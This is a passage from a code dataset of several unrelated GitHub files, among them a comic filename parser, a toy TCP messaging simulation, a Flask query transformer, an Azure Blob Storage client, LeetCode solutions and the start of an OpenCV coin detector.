brackets\r\n results = re.findall(r\"\\([^[\\](){}]*?\\)\",s)\r\n results += re.findall(r\"\\[[^[\\](){}]*?\\]\",s)\r\n results += re.findall(r\"\\{[^[\\](){}]*?\\}\",s)\r\n # 2. strip off the outer brackets and spaces\r\n results = [x.strip(r\"()[]{}\").strip() for x in results]\r\n # 3. if there is a year range, strip of the second half \"2006-2009\" -> \"2006\"\r\n results = [re.sub(r\"(\\d{4})\\s*-\\s*\\d{1,4}\",r\"\\1\",x) for x in results]\r\n # 4. only keep strings that are valid 4 digit years\r\n results = [x for x in results if __isYear(x)]\r\n retval = results[-1] if results else \"\"\r\n\r\n return retval\r\n\r\n\r\n#==============================================================================\r\ndef __extract_numbers(s):\r\n '''\r\n Searches through the given string left-to-right, building an ordered list of\r\n \"issue number-like\" re.match objects. For example, this method finds\r\n matches substrings like: 3, #4, 6.00, .5, -1.0\r\n '''\r\n matches = list(re.finditer(r\"(?u)(^|[_\\s#v])(-?\\d*\\.?\\d)\", s))\r\n # remove matches that look like years, EXCEPT on the \"2000AD\" series,\r\n # the \"The Beano\" series, and any year that starts with '#' (i.e. #1950)\r\n is2000AD = re.match(r\"(?i)\\s*2000[\\s\\.-_]*a[\\s.-_]*d.*\", s)\r\n isBeano = re.match(r\"(?i)\\s*the[\\s\\.-_]+beano[\\s.-_]+#?\\d{4}\", s)\r\n if not is2000AD and not isBeano:\r\n matches = [x for x in matches if not __isYear(x.group(2)) or\r\n (x.start(2) > 0 and s[x.start(2)-1] == '#') ]\r\n return matches\r\n\r\n\r\n#==============================================================================\r\ndef __isYear(d):\r\n ''' Returns true iff the give stream appears to be a valid 4 digit year. 
'''\r\n return re.match(r\"^\\d{4}$\",d) and int(d) > 1900 and int(d) < 2100\r\n","repo_name":"Tenma-Server/Tenma","sub_path":"comics/utils/fnameparser.py","file_name":"fnameparser.py","file_ext":"py","file_size_in_byte":8891,"program_lang":"python","lang":"en","doc_type":"code","stars":248,"dataset":"github-code","pt":"73"} +{"seq_id":"678753567","text":"# -*- coding: utf-8 -*-\n__author__ = 'qingxuan'\n\nimport numpy as np\n\nfrom eg_common import LibC\nfrom fake_redis import newOrCreateConnection\n\n\n\"\"\"\nThe logic module for example\n\"\"\"\nclass VaPowerLogic(object):\n def __init__(self, redis_name=\"0\", io_name =(\"VaPowerLogic\", \"mic_chunk\", \"mic_power\")):\n self.redis = newOrCreateConnection(redis_name)\n self.io_name = io_name\n self.redis.subscribe(self.io_name[1], self.io_name[0], self.mic_chunk)\n self.data_block = []\n\n def mic_chunk(self, data):\n self.data_block.append(data)\n if len(self.data_block) >= 2:\n dt2 = self.data_block\n self.data_block = []\n LibC.rc_pool.run(self.in_data0, dt2)\n\n def in_data0(self, chunks):\n ck2 = b''.join(chunks)\n ck3 = np.fromstring(ck2, dtype=np.int16)\n ck4 = ck3.astype(np.float32)\n ck5 = ck4 ** 2\n ck6 = np.average(ck5)\n ck7 = ck6 / 1000000000.0\n if ck7 > 1:\n ck7 = 1\n # print(ck7)\n self.redis.publish(self.io_name[2], ck7)\n","repo_name":"QingxuanYang/py_example_audio_flower","sub_path":"code/eg_logic.py","file_name":"eg_logic.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"1916207364","text":"from spack.package import *\n\n\nclass PySphinxcontribIssuetracker(PythonPackage):\n \"\"\"Sphinx integration with different issuetrackers.\"\"\"\n\n homepage = \"https://sphinxcontrib-issuetracker.readthedocs.org/\"\n pypi = \"sphinxcontrib-issuetracker/sphinxcontrib-issuetracker-0.11.tar.gz\"\n\n version(\"0.11\", sha256=\"843753d8b5e989116378ab45ecccb368fb78dc56eaa1554ed25e4fbf22745f4e\")\n\n depends_on(\"py-setuptools\", type=\"build\")\n depends_on(\"py-sphinx@1.1:\", type=(\"build\", \"run\"))\n depends_on(\"py-requests@1.1:\", type=(\"build\", \"run\"))\n","repo_name":"spack/spack","sub_path":"var/spack/repos/builtin/packages/py-sphinxcontrib-issuetracker/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":3712,"dataset":"github-code","pt":"73"} +{"seq_id":"22369103199","text":"# Python program to implement server side of chat room.\r\n\r\nimport socket\r\nimport select\r\nimport sys\r\n\r\nimport threading\r\nimport _thread\r\nimport pickle\r\nfrom minCalc import *\r\n\r\n\"\"\"The first argument AF_INET is the address domain of the\r\nsocket. This is used when we have an Internet Domain with\r\nany two hosts The second argument is the type of socket.\r\nSOCK_STREAM means that data or characters are read in\r\na continuous flow.\"\"\"\r\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nserver.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n\r\n# takes the first argument from command prompt as IP address\r\nIP_address = 'localhost'\r\n\r\n# takes second argument from command prompt as port number\r\nPort = 8088\r\nsource = \"H\"\r\nprint(source)\r\n\r\n\"\"\"\r\nbinds the server to an entered IP address and at the\r\nspecified port number.\r\nThe client must be aware of these parameters\r\n\"\"\"\r\nserver.bind((IP_address, Port))\r\n\r\n\"\"\"\r\nlistens for 100 active connections. 
This number can be\r\nincreased as per convenience.\r\n\"\"\"\r\nserver.listen(100)\r\n\r\ndef connectJANthread():\r\n while True:\r\n try:\r\n #s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\n toJan.connect((\"localhost\", int(\"100\")))\r\n\r\n print(\"Jan is connected\")\r\n\r\n except:\r\n continue\r\n\r\ndef conthread(conn, addr):\r\n #\r\n flagCodeWait = 0\r\n while True:\r\n try:\r\n\r\n pack = []\r\n\r\n # print(\"here\")\r\n i = 0\r\n while i == 0:\r\n # what are you? router or man or is it you chan?\r\n pack = conn.recv(1024)\r\n i = 1\r\n gainPack = pickle.loads(pack)\r\n print(gainPack)\r\n send_to = gainPack[1]\r\n gainMessage = gainPack[2]\r\n \r\n if send_to == 'H' :\r\n if gainMessage == 'PEPPER THE PEPPER':\r\n try:\r\n pack = []\r\n pack.append(\"Air Force HQ\")\r\n pack.append(\"jan\")\r\n pack.append(\"Give Coordinates\")\r\n sendPack = pickle.dumps(pack)\r\n flagCodeWait = 1\r\n i = 0\r\n while i == 0:\r\n\r\n toJan.send(bytes(sendPack))\r\n i = 1\r\n\r\n\r\n except:\r\n print(\"Jan does not exists\")\r\n elif flagCodeWait == 1:\r\n pack = []\r\n pack.append(\"Air Force HQ\")\r\n pack.append(\"jan\")\r\n pack.append(\"CONGRATULATIONS WE FRIED DRY GREEN LEAVES\")\r\n sendPack = pickle.dumps(pack)\r\n flagCodeWait = 1\r\n i = 0\r\n while i == 0:\r\n toJan.send(bytes(sendPack))\r\n i = 1\r\n else:\r\n print(\"\")\r\n\r\n except:\r\n print(addr, \"disconnected\")\r\n break\r\n # continue\r\n\r\n\r\ntoJan = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\n_thread.start_new_thread(connectJANthread, ())\r\n\r\nwhile True:\r\n \"\"\"Accepts a connection request and stores two parameters, \r\n conn which is a socket object for that user, and addr \r\n which contains the IP address of the client that just \r\n connected\"\"\"\r\n\r\n conn, addr = server.accept()\r\n print(\"Connection Address(ip, port):\" + str(addr))\r\n\r\n\r\n _thread.start_new_thread(conthread, (conn, addr))\r\n\r\n\r\nconn.close()\r\nserver.close()\r\n","repo_name":"CuriousPonder/TCP_Messaging_Simulation","sub_path":"TCP_Simulation/routerH.py","file_name":"routerH.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"628014789","text":"# Define variable to hold sum of multiples of 3 and 5\nsumMultiples = 0\n\n# Iterate from 1 to 999\nfor i in range(1, 1000):\n \n # If i is divisible by 3 or 5, add it to the sum of multiples\n if i % 3 == 0 or i % 5 == 0:\n sumMultiples += i\n \n # Otherwise... 
don't\n else:\n continue\n\n# Print the result\nprint(sumMultiples)\n","repo_name":"zantelope/01ProjectEuler","sub_path":"bruteForce.py","file_name":"bruteForce.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"10451545009","text":"from collections import deque\n\nfrom flask import current_app, request, session\nfrom flask_login import current_user\nfrom sqlalchemy import exc\n\nfrom powernap.exceptions import InvalidFormError\nfrom powernap.helpers import load_from_string, model_attrs\nfrom powernap.query.columns import BaseQueryColumn, QUERY_COLUMNS\n\n\ndef construct_query(cls, enforce_owner=True, **kwargs):\n \"\"\"Return :class:`flask_sqlalchemy.Pagination` object from kwargs.\n\n :param cls: Target SQLA model for query_construction.\n :param enforce_owner: Ensures `id` in the query is set to\n the `current_user`'s id.\n :param kwargs: Kwargs to overide the query_args passed to\n :meth:`.QueryTransformer.transform`.\n \"\"\"\n query_args = get_query_args_for_cls(\n cls, enforce_owner=enforce_owner, **kwargs)\n return QueryTransformer(cls).transform(query_args)\n\n\ndef extend_query(query, enforce_owner=True, ignore=[], **kwargs):\n \"\"\"Return :class:`flask_sqlalchemy.Pagination` object from kwargs.\n\n :param query: A query on an object.\n :param enforce_owner: Ensures `id` in the query is set to\n the `current_user`'s id.\n :param ignore: Parameters to ignore from the query_args.\n :param kwargs: Kwargs to overide the query_args passed to\n :meth:`.QueryTransformer.transform`.\n\n This method is for using `construct_query`like functionality to extend\n an existing query, like for objects that require complex queries to be\n constructed intitially.\n \"\"\"\n cls = query._primary_entity.type\n query_args = get_query_args_for_cls(\n cls, enforce_owner=enforce_owner, **kwargs)\n for arg in ignore:\n query_args.pop(arg)\n return QueryTransformer(cls, query=query).transform(query_args)\n\n\ndef get_query_args_for_cls(cls, enforce_owner=True, **kwargs):\n \"\"\"Get the queryargs from the request and override them where needed.\n\n :param kwargs: kwargs to override the query args with.\n :param enforce_owner: Ensures `id` in the query is set to\n the `current_user`'s id.\n\n This function serves as the primary means of ensuring query\n construction is done using only the current_user's id,\n and in cases of admin's to prevent confirm_owner from raising errors.\n \"\"\"\n args = request.args.to_dict()\n args.update(kwargs)\n return override_owner_id(cls, args) if enforce_owner else args\n\n\ndef override_owner_id(cls, query_args):\n \"\"\"Used to ensure that users cannot query other users data.\"\"\"\n user_attr, db_attr = model_attrs()\n if not getattr(current_user, 'is_admin', False) and hasattr(cls, db_attr) \\\n and hasattr(current_user, user_attr):\n query_args[db_attr] = getattr(current_user, user_attr)\n return query_args\n\n\nclass QueryTransformer:\n query_columns = QUERY_COLUMNS\n\n def __init__(self, cls=None, query=None):\n self.cls = cls or query._primary_entity.type\n self.initial_query = query\n self.exclude_properties = []\n self.page = current_app.config['PAGINATION_PAGE']\n self.per_page = current_app.config['PAGINATION_PER_PAGE']\n self.pagination = (self.page, self.per_page)\n\n def transform(self, query_args):\n \"\"\"Return :class:`flask_sqlalchemy.Pagination` object from kwargs.\n\n :param query_args: A dictionary of values SQLA Alchemy will use to\n construct the 
query, where the key is the function/field name\n and the value is the value to pass to the function/field.\n It can contain 4 different types of items:\n\n 1. Keys accepted by :meth:`db.session.query.filter_by`.\n\n `kwargs = {'first': 'John', 'last': 'BeGood'}`\n `self.cls.query.filter_by(first='John', last='BeGood')`\n\n 2. Keys that are methods on `db.session.query`.\n\n (Theses keys must start with a `$` to designate they are\n not kwargs to pass to `filter_by`)\n\n `kwargs = {'$order_by': 'first'}`\n `self.cls.query.order_by('first')`\n\n 3. Keys that require a definition of a special method.\n These methods are defined in :module:`..methods`.\n\n (Key must be in the format `column__method`. These keys\n do not need `$` because the `__` identifies them as a\n non-field value.\n\n `kwargs = {'subject__icontains': 'hello'}`\n `..methods.icontains(*args)`\n\n 4. Keys equal to `self.page` and `self.per_page`.\n\n (Theses keys must start with a `$` to designate they are\n not kwargs to pass to `filter_by`)\n\n `kwargs = {'page': 2, 'per_page': 25}`\n `self.cls.query.paginate(2, 25, False)`\n\n If a kwarg not passed to `filter_by` is invalid the exception is\n caught & the query continues executing. If a kwarg not designated\n special, is not a pagination kwarg, & is an invalid field will raise\n a subclassed :class:`core.api.exceptions.ApiError`.\n \"\"\"\n self.pop_exclude_kwargs(query_args)\n paginate = self.pop_pagination_kwargs(query_args)\n query = self.create_query(query_args)\n return self.paginate_query(query, paginate)\n\n def create_query(self, kwargs):\n \"\"\"Create the query. Called by :meth:`.QueryTransformer.transform`.\"\"\"\n impl_data = self.prep_for_impl(kwargs)\n query = self.initial_query if self.initial_query else self.cls.query\n for value_tuple in impl_data:\n query = self.implement(query, value_tuple)\n return query\n\n def prep_for_impl(self, kwargs):\n \"\"\"Return list of tuples for each column.\n\n Appends tuples for filter_by to the beggining of the list.\n The rest are appended in the order they are passed.\n\n NOTE: A priority system would be useful for the future.\n \"\"\"\n impl_data = deque()\n for column, value in kwargs.items():\n method = 'appendleft'\n func = None\n if column.startswith('$') and not hasattr(self.cls, column[1:]):\n column = column[1:]\n method = 'append'\n if '__' in column:\n column, func = column.split('__')\n else:\n func = column\n column = None\n getattr(impl_data, method)((column, value, func))\n return impl_data\n\n def implement(self, query, value_tuple):\n \"\"\"Transform the query with column types corresponding query column.\"\"\"\n column, value, func = value_tuple\n type_cls = None\n if column and hasattr(self.cls, column):\n try:\n # This fails when the attr is a property.\n type_cls = getattr(self.cls, column).type.__class__\n except AttributeError:\n type_cls = \"PropertyQueryColumn\"\n except exc.InvalidRequestError:\n pass\n impl_cls = self.query_columns.get(type_cls, BaseQueryColumn)\n return impl_cls(self.cls, query).handle(column, value, func)\n\n def pop_exclude_kwargs(self, kwargs):\n for key in kwargs:\n if key.endswith('__exclude'):\n self.exclude_properties.append(key.split('__')[0][1:])\n session.exclude_properties = list(self.exclude_properties)\n return True\n\n def pop_pagination_kwargs(self, kwargs):\n \"\"\"Return popped kwargs of first items in `self.pagination` tuples.\n\n If :meth:`db.session.query.paginate` is passed just a `page`\n argument and `page > 1` the method will fail. 
If a `per_page`\n argument is passed without a `page` the logical page number\n should be `1`. Therefore if one of the kwargs is missing the\n `page` kwarg will default to `1`.\n \"\"\"\n paginate = {}\n for key in self.pagination:\n key = '$' + key\n if key in kwargs:\n try:\n paginate[key[1:]] = int(kwargs.pop(key))\n except TypeError:\n pass\n if len(paginate) != len(self.pagination):\n paginate[self.page] = 1\n return paginate\n\n def paginate_query(self, query, paginate):\n \"\"\"Return :class:`flask_sqlalchemy.Pagination` object from query.\"\"\"\n\n try:\n return query.paginate(paginate.get(self.page, 1),\n paginate.get(self.per_page, query.count()),\n False)\n except exc.OperationalError as e:\n msg = \"Invalid Value: {}\".format(e.orig.args[-1])\n errors = {'query_construction': [msg]}\n raise InvalidFormError(description=errors)\n","repo_name":"mvellasco/powernap","sub_path":"powernap/query/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":8768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"3814300957","text":"import base64\nimport datetime\nimport json\nimport xmltodict\nfrom logging import Logger\nimport requests\nimport time\n\nfrom insightconnect_plugin_runtime.exceptions import PluginException\n\nfrom icon_azure_blob_storage.util.helpers import xml_to_json\nfrom icon_azure_blob_storage.util.endpoints import (\n COMMON_URI,\n O365_AUTH_ENDPOINT,\n O365_AUTH_RESOURCE,\n LIST_CONTAINERS_ENDPOINT,\n CONTAINER_ENDPOINT,\n BLOB_ENDPOINT,\n LIST_BLOBS_ENDPOINT,\n)\nfrom typing import Union\nfrom icon_azure_blob_storage.util.constants import BlobType, HeaderParam, UrlParam\n\n\nclass AzureBlobStorageAPI:\n def __init__(self, client_id: str, client_secret: str, tenant_id: str, account_name: str, logger: Logger):\n self._tenant_id = tenant_id\n self._client_id = client_id\n self._client_secret = client_secret\n self._account_name = account_name\n self._uri = COMMON_URI.format(account=account_name)\n self._logger = logger\n self._token_expires_on = 0\n self.auth_token = None\n\n @property\n def auth_token(self) -> str:\n if self._token_expires_on and self._token_expires_on - time.time() > 10:\n return self._auth_token\n\n request_data = {\n \"grant_type\": \"client_credentials\",\n \"client_id\": self._client_id,\n \"resource\": O365_AUTH_RESOURCE,\n \"client_secret\": self._client_secret,\n }\n\n formatted_endpoint = O365_AUTH_ENDPOINT.format(self._tenant_id)\n self._logger.info(f\"Getting token from: {formatted_endpoint}\")\n response = requests.request(\"POST\", formatted_endpoint, data=request_data)\n self._logger.info(f\"Authentication request status: {str(response.status_code)}\")\n\n if response.status_code != 200:\n self._logger.error(response.text)\n raise PluginException(\n cause=\"Unable to authorize against Azure Storage API.\",\n assistance=\"The application may not be authorized to connect to the Azure Storage API. 
\"\n \"Please contact your Azure administrator.\",\n data=response.text,\n )\n response_json = response.json()\n self.auth_token = response_json.get(\"access_token\")\n self._token_expires_on = int(response_json.get(\"expires_on\"))\n self._logger.info(f\"Authentication Token: ****************{self._auth_token[-5:]}\")\n\n return self._auth_token\n\n @auth_token.setter\n def auth_token(self, auth_token):\n self._auth_token = auth_token\n\n def _get_headers(self, additional_headers: dict = None) -> dict:\n base_headers = {\n \"x-ms-version\": \"2021-04-10\",\n \"x-ms-date\": datetime.datetime.utcnow().strftime(\"%a, %d %b %Y %H:%M:%S GMT\"),\n \"Authorization\": f\"Bearer {self.auth_token}\",\n }\n if additional_headers:\n return {**base_headers, **additional_headers}\n return base_headers\n\n def create_container(self, container_name: str, additional_headers: dict = None) -> bool:\n self._logger.info(f\"Creating a container named {container_name} for {self._account_name} account...\")\n self.make_request(\n method=\"PUT\",\n endpoint=CONTAINER_ENDPOINT.format(container_name=container_name),\n headers=self._get_headers(additional_headers),\n )\n return True\n\n def list_containers(\n self,\n prefix: str = \"\",\n max_results: int = None,\n include: [] = None,\n timeout: int = None,\n additional_headers: dict = None,\n ) -> object:\n self._logger.info(f\"Listing containers belonging to {self._account_name}...\")\n json_response = self.make_json_request(\n method=\"GET\",\n endpoint=LIST_CONTAINERS_ENDPOINT,\n headers=self._get_headers(additional_headers),\n params={\n UrlParam.PREFIX: prefix,\n UrlParam.MAX_RESULTS: max_results,\n UrlParam.INCLUDE: include,\n UrlParam.TIMEOUT: timeout,\n },\n )\n return json_response.get(\"EnumerationResults\", {})\n\n def delete_container(self, container_name: str, additional_headers: dict = None) -> bool:\n self._logger.info(f\"Deleting a container named {container_name} for {self._account_name} account...\")\n self.make_request(\n method=\"DELETE\",\n endpoint=CONTAINER_ENDPOINT.format(container_name=container_name),\n headers=self._get_headers(additional_headers),\n )\n return True\n\n def list_blobs(\n self,\n container_name: str,\n prefix: str = None,\n delimiter: str = None,\n max_results: int = None,\n include: [] = None,\n timeout: int = None,\n additional_headers: dict = None,\n ) -> object:\n self._logger.info(f\"Listing blobs in {container_name} container belonging to {self._account_name}...\")\n json_response = self.make_json_request(\n method=\"GET\",\n endpoint=LIST_BLOBS_ENDPOINT.format(container_name=container_name),\n headers=self._get_headers(additional_headers),\n params={\n UrlParam.PREFIX: prefix,\n UrlParam.DELIMITER: delimiter,\n UrlParam.MAX_RESULTS: max_results,\n UrlParam.INCLUDE: include,\n UrlParam.TIMEOUT: timeout,\n },\n )\n return json_response.get(\"EnumerationResults\", {})\n\n def put_blob(\n self,\n container_name: str,\n blob_name: str,\n blob_type: str,\n timeout: int = None,\n block_blob_content: str = None,\n access_tier: str = None,\n additional_headers: dict = None,\n page_blob_content_length: str = None,\n ) -> bool:\n\n self._logger.info(\n f\"Creating a blob named {blob_name} in {container_name} container for {self._account_name} account...\"\n )\n block_blob_content, page_blob_content_length = self._parse_put_blob_params(\n blob_type=blob_type,\n block_blob_content=block_blob_content,\n page_blob_content_length=page_blob_content_length,\n )\n headers = self._get_put_blob_headers(\n blob_type=blob_type,\n 
additional_headers=additional_headers,\n block_blob_content=block_blob_content,\n page_blob_content_length=page_blob_content_length,\n access_tier=access_tier,\n )\n self.make_request(\n method=\"PUT\",\n endpoint=BLOB_ENDPOINT.format(container_name=container_name, blob_name=blob_name),\n headers=headers,\n params={UrlParam.TIMEOUT: timeout},\n data=block_blob_content.encode().decode(\"unicode_escape\").encode(\"raw_unicode_escape\"),\n )\n return True\n\n def get_blob(\n self,\n container_name: str,\n blob_name: str,\n snapshot_id: str = None,\n version_id: str = None,\n byte_to_string: str = False,\n additional_headers: dict = None,\n ) -> Union[bytes, str]:\n\n self._logger.info(\n f\"Getting a blob named {blob_name} in {container_name} container for {self._account_name} account...\"\n )\n response = self.make_request(\n method=\"GET\",\n endpoint=BLOB_ENDPOINT.format(container_name=container_name, blob_name=blob_name),\n headers=self._get_headers(additional_headers),\n params={\n UrlParam.SNAPSHOT_ID: snapshot_id,\n UrlParam.VERSION_ID: version_id,\n },\n )\n if byte_to_string:\n return response.text\n\n return str(base64.b64encode(response.content), \"utf-8\")\n\n def delete_blob(\n self,\n container_name: str,\n blob_name: str,\n snapshot_id: str = None,\n version_id: str = None,\n delete_snapshots: str = None,\n additional_headers: dict = None,\n ) -> str:\n\n if delete_snapshots:\n additional_headers[HeaderParam.DELETE_SNAPSHOTS] = delete_snapshots\n self._logger.info(\n f\"Deleting a blob named {blob_name} in {container_name} container for {self._account_name} account...\"\n )\n response = self.make_request(\n method=\"DELETE\",\n endpoint=BLOB_ENDPOINT.format(container_name=container_name, blob_name=blob_name),\n headers=self._get_headers(additional_headers),\n params={UrlParam.SNAPSHOT_ID: snapshot_id, UrlParam.VERSION_ID: version_id},\n )\n\n return response.headers.get(HeaderParam.DELETE_TYPE_PERMANENT)\n\n def make_request(\n self, method: str, endpoint: str, headers: dict, params: dict = None, data: bytes = \"\"\n ) -> requests.Response:\n try:\n response = requests.request(\n method=method, url=self._uri + endpoint, headers=headers, params=params, data=data\n )\n\n if response.status_code == 400:\n raise PluginException(\n cause=\"Invalid input parameters.\",\n assistance=\"Please verify inputs and if the issue persists, contact support.\",\n data=xml_to_json(response.text),\n )\n if response.status_code == 401:\n raise PluginException(preset=PluginException.Preset.API_KEY, data=xml_to_json(response.text))\n if response.status_code == 403:\n raise PluginException(\n cause=\"Operation is not allowed.\",\n assistance=\"Please verify inputs and if the issue persists, contact support.\",\n data=xml_to_json(response.text),\n )\n if response.status_code == 404:\n raise PluginException(\n cause=\"Resource not found.\",\n assistance=\"Please verify inputs and if the issue persists, contact support.\",\n data=xml_to_json(response.text),\n )\n if response.status_code == 409:\n raise PluginException(\n cause=\"Request made conflicts with an existing resource.\",\n assistance=\"Please verify inputs and if the issue persists, contact support.\",\n data=xml_to_json(response.text),\n )\n if 400 <= response.status_code < 500:\n raise PluginException(\n preset=PluginException.Preset.UNKNOWN,\n data=xml_to_json(response.text),\n )\n if response.status_code >= 500:\n raise PluginException(preset=PluginException.Preset.SERVER_ERROR, data=xml_to_json(response.text))\n\n if 200 <= 
response.status_code < 300:\n return response\n\n raise PluginException(preset=PluginException.Preset.UNKNOWN, data=response.text)\n except requests.exceptions.HTTPError as e:\n raise PluginException(preset=PluginException.Preset.UNKNOWN, data=e)\n\n def make_json_request(self, method: str, endpoint: str, headers: dict = None, params: dict = None) -> dict:\n try:\n response = self.make_request(method=method, endpoint=endpoint, params=params, headers=headers)\n return xmltodict.parse(response.text)\n except json.decoder.JSONDecodeError as e:\n raise PluginException(preset=PluginException.Preset.INVALID_JSON, data=e)\n\n def _parse_put_blob_params(self, blob_type: str, block_blob_content: str, page_blob_content_length: str):\n if blob_type == BlobType.PAGE_BLOB and not page_blob_content_length:\n raise PluginException(\n cause=f\"Blob Content Length parameter is required for {BlobType.PAGE_BLOB}\",\n assistance=\"Please provide this parameter or change Blob Type.\",\n )\n if blob_type != BlobType.PAGE_BLOB and page_blob_content_length:\n self._logger.warning(\n f\"Blob Content Length param can be used only with {BlobType.PAGE_BLOB}. This parameter will be ignored.\"\n )\n page_blob_content_length = 0\n if blob_type != BlobType.BLOCK_BLOB and block_blob_content:\n self._logger.warning(\n f\"Blob Content param can be used only with {BlobType.BLOCK_BLOB}. Initializing empty {blob_type}.\"\n )\n block_blob_content = \"\"\n return block_blob_content, page_blob_content_length\n\n def _get_put_blob_headers(\n self,\n blob_type: str,\n additional_headers: dict = None,\n block_blob_content: str = \"\",\n page_blob_content_length: str = None,\n access_tier: str = \"\",\n ) -> dict:\n additional_headers[HeaderParam.BlobType] = blob_type\n if access_tier:\n additional_headers[HeaderParam.ACCESS_TIER] = access_tier\n if page_blob_content_length:\n additional_headers[HeaderParam.BLOB_CONTENT_LENGTH] = str(page_blob_content_length)\n if block_blob_content:\n additional_headers[HeaderParam.CONTENT_LENGTH] = str(len(block_blob_content))\n return self._get_headers(additional_headers)\n","repo_name":"rapid7/insightconnect-plugins","sub_path":"plugins/azure_blob_storage/icon_azure_blob_storage/util/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":13187,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"73"} +{"seq_id":"23057180989","text":"'''\n39. Combination Sum\n\nMedium\n\nGiven an array of distinct integers candidates and a target integer target, return a list of all unique combinations of candidates where the chosen numbers sum to target. You may return the combinations in any order.\n\nThe same number may be chosen from candidates an unlimited number of times. Two combinations are unique if the \nfrequency of at least one of the chosen numbers is different.\n\nThe test cases are generated such that the number of unique combinations that sum up to target is less than 150 combinations for the given input.\n\n \nExample 1:\nInput: candidates = [2,3,6,7], target = 7\nOutput: [[2,2,3],[7]]\nExplanation:\n2 and 3 are candidates, and 2 + 2 + 3 = 7. 
Note that 2 can be used multiple times.\n7 is a candidate, and 7 = 7.\nThese are the only two combinations.\n\nExample 2:\nInput: candidates = [2,3,5], target = 8\nOutput: [[2,2,2,2],[2,3,3],[3,5]]\n\nExample 3:\nInput: candidates = [2], target = 1\nOutput: []\n \n\nConstraints:\n\n1 <= candidates.length <= 30\n2 <= candidates[i] <= 40\nAll elements of candidates are distinct.\n1 <= target <= 40\n\n'''\n\n# SOLUTION\n\nclass Solution:\n def combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:\n def targetCombination(candidates, target, idx, temp):\n if idx == len(candidates):\n if target == 0:\n result.append(temp[:])\n return\n\n if candidates[idx] <= target:\n temp.append(candidates[idx])\n # same index\n targetCombination(candidates, target - candidates[idx], idx, temp)\n temp.pop()\n\n targetCombination(candidates, target, idx+1, temp)\n\n result = []\n targetCombination(candidates, target, 0, [])\n\n return result\n \n\n# Using DFS\nclass Solution:\n def combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:\n if not candidates: return []\n res = []\n candidates.sort()\n def dfs(idx, path, cur):\n if cur > target: \n return\n \n if cur == target:\n res.append(path)\n return\n \n for i in range(idx, len(candidates)):\n dfs(i, path+[candidates[i]], cur+candidates[i])\n\n dfs(0, [], 0)\n return res\n\n\n\n\n# practice\ndef combinationSum(idx, arr, target, ds):\n if idx == len(arr):\n if target == 0:\n ans.append(ds[:])\n return\n\n if arr[idx] <= target: # pick condition\n ds.append(arr[idx])\n combinationSum(idx, arr, target - arr[idx], ds)\n ds.pop()\n\n combinationSum(idx + 1, arr, target, ds)\n\n\narr = [2, 3, 6, 7]\nans = []\ncombinationSum(0, arr, 12, [])\nprint(ans)\n","repo_name":"SahnawazShaban/Leetcode-and-GFG-Problems","sub_path":"Step-Up/Recursion/4) Combination Sum I.py","file_name":"4) Combination Sum I.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"19213856939","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 13 11:09:45 2018\n\n@author: Ian, Bram\n@version: 0.1\n\nthis coin detection uses 2 core features. \n1 is the diffrence list from the system. this list contains the all the size\ndiffrences between the coins. Secondly is a colour finder with selected \nwich will set a boundry between which values of the diffrences its going to look.\nWich means that it atleast 2 coins of diffrent values are needed to work in the same picture. \nThis is more to let the system work with variable distances. this will then \nselect the largest coin in the picture and use that one as a referance \nbetween the other coins. 
\n\"\"\"\n\nimport copy\n\nimport numpy as np\n\n#from __future__ import division\nimport cv2\n\n\ndef nothing(*arg):\n pass\n\n\ndef get_circles(image, maskrange, kernel, minRadius, maxRadius):\n colorLow = np.array([maskrange[0], maskrange[1], maskrange[2]])\n colorHigh = np.array([maskrange[3], maskrange[4], maskrange[5]])\n mask = cv2.inRange(image, colorLow, colorHigh)\n mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernal)\n mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernal)\n threshold = cv2.adaptiveThreshold(\n mask, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 5, 5)\n circles = cv2.HoughCircles(threshold, cv2.HOUGH_GRADIENT, 2, 80,\n param1=45,\n param2=50,\n minRadius=minRadius,\n maxRadius=maxRadius)\n circles = np.uint16(np.around(circles))\n return circles\n\n\n# CV parameters\nfont = cv2.FONT_HERSHEY_SIMPLEX\nfontScale = 1\nfontColor = (255, 255, 255)\nlineType = 2\npower = 1\nresize = 0.25\n# coin list\ncoins = [\n [\"Copper 1 cent\", 0.01],\n [\"Copper 2 cent\", 0.02],\n [\"Copper 5 cent\", 0.05],\n [\"Messing 10 cent\", 0.10],\n [\"Messing 20 cent\", 0.20],\n [\"Messing 50 cent\", 0.50],\n [\"Silver 1 Euro\", 1],\n [\"Silver 2 Euro\", 2]\n]\n# size diffrences\ndiffrence = np.array([\n [1.000,\t1.170,\t1.307,\t1.227,\t1.386,\t1.500,\t1.432,\t1.500],\n [0.854, 1.000,\t1.117,\t1.049,\t1.184,\t1.282,\t1.223,\t1.282],\n [0.765,\t0.896,\t1.000,\t0.939,\t1.061,\t1.148,\t1.096,\t1.148],\n [0.815,\t0.954,\t1.065,\t1.000,\t1.130,\t1.222,\t1.167,\t1.222],\n 